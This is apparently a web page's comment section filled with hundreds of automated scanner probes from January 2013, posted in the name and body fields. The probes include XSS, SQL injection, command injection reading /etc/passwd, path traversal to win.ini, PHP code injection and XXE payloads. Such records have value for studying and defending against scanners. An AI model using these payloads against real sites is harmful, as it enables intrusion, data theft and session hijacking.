    unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

  535. # <input autofocus onfocus=prompt(931163)> on 22 January 2013 at 23:33:

    1

  536. # gGvGf 1<ScRiPt >prompt(953631)</ScRiPt> on 22 January 2013 at 23:33:

    1

  537. # 1 on 22 January 2013 at 23:33:

    '"()&%1<ScRiPt >prompt(982796)</ScRiPt>

  538. # 1 on 22 January 2013 at 23:33:

    OTMzODk1

  539. # 1 on 22 January 2013 at 23:33:

    undefined1<ScRiPt >prompt(901376)</ScRiPt>

  540. # 1 on 22 January 2013 at 23:33:

    1<ScRiPt
    >prompt(997563)</ScRiPt>

  541. # 1 on 22 January 2013 at 23:33:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921164></ScRiPt>

  542. # 1 on 22 January 2013 at 23:33:

    1<ScRiPt
    >prompt(940998)</ScRiPt>

  543. # 1 on 22 January 2013 at 23:33:

    <video><source onerror="javascript:prompt(902270)">

  544. # 1 on 22 January 2013 at 23:33:

    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935881)"></g></svg>

  545. # 1 on 22 January 2013 at 23:33:

    1[url=javascript:prompt(931551)]http://www.acunetix.com[/url]

  546. # 1 on 22 January 2013 at 23:34:

    1<div style=width:expression(prompt(958251))>

  547. # 1 on 22 January 2013 at 23:34:

    <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='958217'>

  548. # 1 on 22 January 2013 at 23:34:

    <body onload=prompt(952795)>

  549. # 1 on 22 January 2013 at 23:34:

    <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983204)>

  550. # 1 on 22 January 2013 at 23:34:

    <img src=xyz OnErRor=prompt(938867)>

  551. # 1 on 22 January 2013 at 23:34:

    1%3CScRiPt%20%3Eprompt(946940)%3C/sCripT%3E

  552. # 1 on 22 January 2013 at 23:34:

  553. # 1 on 22 January 2013 at 23:34:

    <input autofocus onfocus=prompt(914461)>

  554. # 1 on 22 January 2013 at 23:34:

    yhVr3
    1<ScRiPt >prompt(924711)</ScRiPt>

  555. # 1 on 23 January 2013 at 7:10:

    1

  556. # response.write(9274868*9612904) on 23 January 2013 at 13:35:

    1

  557. # '+response.write(9274868*9612904)+' on 23 January 2013 at 13:35:

    1

  558. # 1 on 23 January 2013 at 13:35:

    1

  559. # &cat /etc/passwd& on 23 January 2013 at 13:35:

    1

  560. # 1 on 23 January 2013 at 13:35:

    1

  561. # '&cat /etc/passwd&' on 23 January 2013 at 13:35:

    1

  562. # "+response.write(9274868*9612904)+" on 23 January 2013 at 13:35:

    1

  563. # SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:35:

    1

  564. # -1 or 90=90 on 23 January 2013 at 13:35:

    1

  565. # "&cat /etc/passwd&" on 23 January 2013 at 13:35:

    1

  566. # SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:35:

    1

  567. # -1 or 90=0 on 23 January 2013 at 13:35:

    1

  568. # cat /etc/passwd on 23 January 2013 at 13:35:

    1

  569. # -1' or '43'='43 on 23 January 2013 at 13:35:

    1

  570. # `cat /etc/passwd` on 23 January 2013 at 13:35:

    1

  571. # ../../../../../../../../../../etc/passwd on 23 January 2013 at 13:35:

    1

  572. # |cat /etc/passwd# on 23 January 2013 at 13:35:

    1

  573. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 23 January 2013 at 13:35:

    1

  574. # -1' or '43'='0 on 23 January 2013 at 13:35:

    1

  575. # '|'ld on 23 January 2013 at 13:35:

    1

  576. # ../../../../../../../../../../etc/passwd.jpg on 23 January 2013 at 13:35:

    1

  577. # -1" or "68"="68 on 23 January 2013 at 13:35:

    1

  578. # SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:35:

    1

  579. # "|"ld on 23 January 2013 at 13:35:

    1

  580. # Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 23 January 2013 at 13:35:

    1

  581. # -1" or "68"="0 on 23 January 2013 at 13:35:

    1

  582. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 23 January 2013 at 13:35:

    1

  583. # 1 and sleep(4) on 23 January 2013 at 13:35:

    1

  584. # /../..//../..//../..//../..//../..//etc/passwd.jpg on 23 January 2013 at 13:35:

    1

  585. # 1 or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:35:

    1

  586. # ;cat /etc/passwd; on 23 January 2013 at 13:35:

    1

  587. # .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 23 January 2013 at 13:35:

    1

  588. # 1' and sleep(4)=' on 23 January 2013 at 13:35:

    1

  589. # ';cat /etc/passwd;' on 23 January 2013 at 13:35:

    1

  590. # /etc/passwd on 23 January 2013 at 13:35:

    1

  591. # 1' and (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:35:

    1

  592. # ";cat /etc/passwd;" on 23 January 2013 at 13:35:

    1

  593. # ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 23 January 2013 at 13:35:

    1

  594. # 1" and sleep(4)=" on 23 January 2013 at 13:35:

    1

  595. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 23 January 2013 at 13:35:

    1

  596. # 1 on 23 January 2013 at 13:35:

    response.write(9760597*9502293)

  597. # 1' or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:35:

    1

  598. # .. on 23 January 2013 at 13:35:

    1

  599. # 1 on 23 January 2013 at 13:35:

    '+response.write(9760597*9502293)+'

  600. # invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 23 January 2013 at 13:35:

    1

  601. # 1 on 23 January 2013 at 13:35:

    "+response.write(9760597*9502293)+"

  602. # 1" or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:35:

    1

  603. # file:///etc/passwd on 23 January 2013 at 13:35:

    1

  604. # ${99170+99790} on 23 January 2013 at 13:35:

    1

  605. # ||cat /etc/passwd on 23 January 2013 at 13:35:

    1

  606. # 1'=sleep(4)=' on 23 January 2013 at 13:35:

    1

  607. # /\../\../\../\../\../\../\../etc/passwd on 23 January 2013 at 13:35:

    1

  608. # 1 on 23 January 2013 at 13:35:

    1

  609. # &dir on 23 January 2013 at 13:35:

    1

  610. # ../../../../../../../../../../windows/win.ini on 23 January 2013 at 13:35:

    1

  611. # 1"=sleep(4)=" on 23 January 2013 at 13:35:

    1

  612. # '&dir&' on 23 January 2013 at 13:35:

    1

  613. # 1 on 23 January 2013 at 13:35:


    SomeCustomInjectedHeader:injected_by_wvs

  614. # "&dir&" on 23 January 2013 at 13:35:

    1

  615. # 1 on 23 January 2013 at 13:35:

    ${99647+99852}

  616. # |dir on 23 January 2013 at 13:35:

    1

  617. # http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 23 January 2013 at 13:35:

    1

  618. # 1 on 23 January 2013 at 13:35:


    SomeCustomInjectedHeader:injected_by_wvs

  619. # '|dir on 23 January 2013 at 13:35:

    1

  620. # ../../../../../../../../../../boot.ini on 23 January 2013 at 13:35:

    1

  621. # 1some_inexistent_file_with_long_name%00.jpg on 23 January 2013 at 13:35:

    1

  622. # 1;select pg_sleep(4); -- on 23 January 2013 at 13:35:

    1

  623. # 1 on 23 January 2013 at 13:35:


    SomeCustomInjectedHeader:injected_by_wvs

  624. # 1';select pg_sleep(4); -- on 23 January 2013 at 13:35:

    1

  625. # 1&n940145=v997823 on 23 January 2013 at 13:35:

    1

  626. # 1; waitfor delay '0:0:4' -- on 23 January 2013 at 13:35:

    1

  627. # ../../../../../../../../../../windows/win.ini.jpg on 23 January 2013 at 13:35:

    1

  628. # 268435455 on 23 January 2013 at 13:35:

    1

  629. # "|dir on 23 January 2013 at 13:35:

    1

  630. # http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 23 January 2013 at 13:35:

    1

  631. # on 23 January 2013 at 13:35:

    1

  632. # 1'; waitfor delay '0:0:4' -- on 23 January 2013 at 13:35:

    1

  633. # on 23 January 2013 at 13:35:

    1

  634. # ................windowswin.ini on 23 January 2013 at 13:35:

    1

  635. # ..\..\..\..\..\..\..\..\windows\win.ini on 23 January 2013 at 13:35:

    1

  636. # ) on 23 January 2013 at 13:35:

    1

  637. # /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 23 January 2013 at 13:35:

    1

  638. # !(()&&!|*|*| on 23 January 2013 at 13:35:

    1

  639. # ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 23 January 2013 at 13:35:

    1

  640. # 1"; waitfor delay '0:0:4' -- on 23 January 2013 at 13:35:

    1

  641. # .. on 23 January 2013 at 13:35:

    1

  642. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 23 January 2013 at 13:35:

    1

  643. # 1e309 on 23 January 2013 at 13:35:

    1

  644. # 1 on 23 January 2013 at 13:35:

    1&n942563=v980078

  645. # '"\'\");|]*{ <> on 23 January 2013 at 13:35:

    1

  646. # unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 23 January 2013 at 13:35:

    1

  647. # ^(#$!@#$)(()))****** on 23 January 2013 at 13:35:

    1

  648. # Array on 23 January 2013 at 13:35:

    1

  649. # Array on 23 January 2013 at 13:35:

    1

  650. # '"() on 23 January 2013 at 13:35:

    1

  651. # 1 on 23 January 2013 at 13:35:

    1

  652. # 1 on 23 January 2013 at 13:35:

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

  653. # 1 on 23 January 2013 at 13:35:

    1some_inexistent_file_with_long_name%00.jpg

  654. # ;print(md5(acunetix_wvs_security_test)); on 23 January 2013 at 13:35:

    1

  655. # ';print(md5(acunetix_wvs_security_test));$a=' on 23 January 2013 at 13:35:

    1

  656. # ";print(md5(acunetix_wvs_security_test));$a=" on 23 January 2013 at 13:35:

    1

  657. # 1 on 23 January 2013 at 13:35:

    Array

  658. # ${@print(md5(acunetix_wvs_security_test))} on 23 January 2013 at 13:35:

    1

  659. # 1 on 23 January 2013 at 13:35:

    '"()

  660. # ${@print(md5(acunetix_wvs_security_test))}\ on 23 January 2013 at 13:35:

    1

  661. # http://testasp.vulnweb.com/t/xss.html?%00.jpg on 23 January 2013 at 13:35:

    1

  662. # 1 on 23 January 2013 at 13:35:

    http://testasp.vulnweb.com/t/fit.txt?%00.jpg

  663. # 1 on 23 January 2013 at 13:35:

    1

  664. # 1 on 23 January 2013 at 13:35:

    )

  665. # acunetix_wvs_invalid_filename on 23 January 2013 at 13:35:

    1

  666. # 1 on 23 January 2013 at 13:35:

    !(()&&!|*|*|

  667. # 6030 on 23 January 2013 at 13:35:

    1

  668. # 1 on 23 January 2013 at 13:35:

    ^(#$!@#$)(()))******

  669. # 6030 on 23 January 2013 at 13:35:

    1

  670. # 1 on 23 January 2013 at 13:35:

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  671. # 1 on 23 January 2013 at 13:35:

    1

  672. # ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 23 January 2013 at 13:35:

    1

  673. # 1'" on 23 January 2013 at 13:35:

    1

  674. # 6030/. on 23 January 2013 at 13:35:

    1

  675. # 1 on 23 January 2013 at 13:36:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  676. # \ on 23 January 2013 at 13:36:

    1

  677. # //www.acunetix.tst on 23 January 2013 at 13:36:

    1

  678. # 1Axa7Ac on 23 January 2013 at 13:36:

    1

  679. # @@04GQp on 23 January 2013 at 13:36:

    1

  680. # JyI= on 23 January 2013 at 13:36:

    1

  681. # 1 on 23 January 2013 at 13:36:

    //www.acunetix.tst

  682. # ?'?" on 23 January 2013 at 13:36:

    1

  683. # '" on 23 January 2013 at 13:36:

    1

  684. # 1 on 23 January 2013 at 13:36:

    ;print(md5(acunetix_wvs_security_test));

  685. # ?''?"" on 23 January 2013 at 13:36:

    1

  686. # <!-- on 23 January 2013 at 13:36:

    1

  687. # 1 on 23 January 2013 at 13:36:

    ';print(md5(acunetix_wvs_security_test));$a='

  688. # <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif"> ]> <xxx>&acunetixe on 23 January 2013 at 13:36:

    1

  689. # 1 on 23 January 2013 at 13:36:

    ";print(md5(acunetix_wvs_security_test));$a="

  690. # 1 on 23 January 2013 at 13:36:

    1

  691. # 1 on 23 January 2013 at 13:36:

    ${@print(md5(acunetix_wvs_security_test))}

  692. # 1 on 23 January 2013 at 13:36:

    ${@print(md5(acunetix_wvs_security_test))}\

  693. # 1 on 23 January 2013 at 13:36:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE acunetix [
    <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif">
    ]>
    <xxx>&acunetixent;</xxx>

  694. # 1 on 23 January 2013 at 13:36:

    268435455

  695. # '"()&%1<ScRiPt >prompt(953226)</ScRiPt> on 23 January 2013 at 13:36:

    1

  696. # 1 on 23 January 2013 at 13:36:

    '"

  697. # 1 on 23 January 2013 at 13:36:

  698. # OTA1MjAx on 23 January 2013 at 13:36:

    1

  699. # 1 on 23 January 2013 at 13:36:

    <!--

  700. # 1 on 23 January 2013 at 13:36:

    ..

  701. # 1 on 23 January 2013 at 13:36:

    1e309

  702. # 1 on 23 January 2013 at 13:36:

    '"\'\");|]*{
    <>

  703. # 1 on 23 January 2013 at 13:36:

    Array

  704. # 1 on 23 January 2013 at 13:36:

    1

  705. # undefined1<ScRiPt >prompt(932087)</ScRiPt> on 23 January 2013 at 13:36:

    1

  706. # 1<ScRiPt >prompt(975642)</ScRiPt> on 23 January 2013 at 13:36:

    1

  707. # 1 on 23 January 2013 at 13:36:

    acunetix_wvs_invalid_filename

  708. # 1 on 23 January 2013 at 13:36:

    6030

  709. # 1 on 23 January 2013 at 13:36:

    6030

  710. # 1 on 23 January 2013 at 13:36:

    6030/.

  711. # 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976297></ScRiPt> on 23 January 2013 at 13:36:

    1

  712. # 1 on 23 January 2013 at 13:36:

    &cat /etc/passwd&

  713. # 1 on 23 January 2013 at 13:36:

    '&cat /etc/passwd&'

  714. # 1 on 23 January 2013 at 13:36:

    "&cat /etc/passwd&"

  715. # 1 on 23 January 2013 at 13:36:


    cat /etc/passwd

  716. # 1<ScRiPt >prompt(979512)</ScRiPt> on 23 January 2013 at 13:36:

    1

  717. # 1 on 23 January 2013 at 13:36:

    `cat /etc/passwd`

  718. # 1 on 23 January 2013 at 13:36:

    |cat /etc/passwd#

  719. # 1 on 23 January 2013 at 13:36:

    '|'ld

  720. # <video><source onerror="javascript:prompt(996701)"> on 23 January 2013 at 13:36:

    1

  721. # 1 on 23 January 2013 at 13:36:

    "|"ld

  722. # 1 on 23 January 2013 at 13:36:

    ;cat /etc/passwd;

  723. # 1 on 23 January 2013 at 13:36:

    1

  724. # 1 on 23 January 2013 at 13:36:

    ';cat /etc/passwd;'

  725. # 1 on 23 January 2013 at 13:36:

    1

  726. # 1 on 23 January 2013 at 13:36:

    ";cat /etc/passwd;"

  727. # 1 on 23 January 2013 at 13:36:

    -1 or 19=19

  728. # 1 on 23 January 2013 at 13:36:

    ||cat /etc/passwd

  729. # 1 on 23 January 2013 at 13:36:

    -1 or 19=0

  730. # 1 on 23 January 2013 at 13:36:

    &dir

  731. # 1 on 23 January 2013 at 13:36:

    1

  732. # 1 on 23 January 2013 at 13:36:

    1'"

  733. # 1 on 23 January 2013 at 13:36:

    -1' or '49'='49

  734. # 1 on 23 January 2013 at 13:36:

    \

  735. # <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909372)"></g></svg> on 23 January 2013 at 13:36:

    1

  736. # 1 on 23 January 2013 at 13:37:

    -1' or '49'='0

  737. # 1 on 23 January 2013 at 13:37:

    1Axa7Ac

  738. # 1 on 23 January 2013 at 13:37:

    '&dir&'

  739. # 1 on 23 January 2013 at 13:37:

    -1" or "55"="55

  740. # 1 on 23 January 2013 at 13:37:

    @@qQqMb

  741. # 1 on 23 January 2013 at 13:37:

    JyI=

  742. # 1 on 23 January 2013 at 13:37:

    -1" or "55"="0

  743. # 1 on 23 January 2013 at 13:37:

    ?'?"

  744. # 1[url=javascript:prompt(988089)]http://www.acunetix.com[/url] on 23 January 2013 at 13:37:

    1

  745. # 1 on 23 January 2013 at 13:37:

    ?''?""

  746. # 1 on 23 January 2013 at 13:37:

    "&dir&"

  747. # 1 on 23 January 2013 at 13:37:

    1 and sleep(9.828)

  748. # 1 on 23 January 2013 at 13:37:

    1 or (sleep(9.828)+1) limit 1 --

  749. # 1 on 23 January 2013 at 13:37:

    |dir

  750. # 1 on 23 January 2013 at 13:37:

    1' and sleep(9.828)='

  751. # 1 on 23 January 2013 at 13:37:

    '|dir

  752. # 1<div style=width:expression(prompt(984992))> on 23 January 2013 at 13:37:

    1

  753. # 1 on 23 January 2013 at 13:37:

    "|dir

  754. # 1 on 23 January 2013 at 13:37:

    1' and (sleep(9.828)+1) limit 1 --

  755. # 1 on 23 January 2013 at 13:37:

    1" and sleep(9.828)="

  756. # <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='903758'> on 23 January 2013 at 13:37:

    1

  757. # 1 on 23 January 2013 at 13:37:

    1' or (sleep(9.828)+1) limit 1 --

  758. # 1 on 23 January 2013 at 13:37:

    1" or (sleep(9.828)+1) limit 1 --

  759. # <body onload=prompt(931788)> on 23 January 2013 at 13:37:

    1

  760. # 1 on 23 January 2013 at 13:37:

    1'=sleep(9.828)='

  761. # 1 on 23 January 2013 at 13:37:

    1"=sleep(9.828)="

  762. # <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942836)> on 23 January 2013 at 13:37:

    1

  763. # 1 on 23 January 2013 at 13:37:

    1;select pg_sleep(9.828); --

  764. # 1 on 23 January 2013 at 13:37:

    1';select pg_sleep(9.828); --

  765. # 1 on 23 January 2013 at 13:37:

    ../../../../../../../../../../etc/passwd

  766. # 1 on 23 January 2013 at 13:37:

    1; waitfor delay '0:0:9.828' --

  767. # 1 on 23 January 2013 at 13:37:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  768. # 1 on 23 January 2013 at 13:37:

    1'; waitfor delay '0:0:9.828' --

  769. # <img src=xyz OnErRor=prompt(961765)> on 23 January 2013 at 13:37:

    1

  770. # 1 on 23 January 2013 at 13:37:

    ../../../../../../../../../../etc/passwd.jpg

  771. # 1 on 23 January 2013 at 13:37:

    1"; waitfor delay '0:0:9.828' --

  772. # 1 on 23 January 2013 at 13:37:

    Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

  773. # 1 on 23 January 2013 at 13:37:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  774. # 1%3CScRiPt%20%3Eprompt(996776)%3C/sCripT%3E on 23 January 2013 at 13:37:

    1

  775. # 1 on 23 January 2013 at 13:37:

    /../..//../..//../..//../..//../..//etc/passwd.jpg

  776. # 1 on 23 January 2013 at 13:37:

    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

  777. # 1 on 23 January 2013 at 13:37:

    /etc/passwd

  778. # 1 on 23 January 2013 at 13:37:

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

  779. # on 23 January 2013 at 13:37:

    1

  780. # 1 on 23 January 2013 at 13:37:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

  781. # 1 on 23 January 2013 at 13:37:

    ..

  782. # 1 on 23 January 2013 at 13:37:

    invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.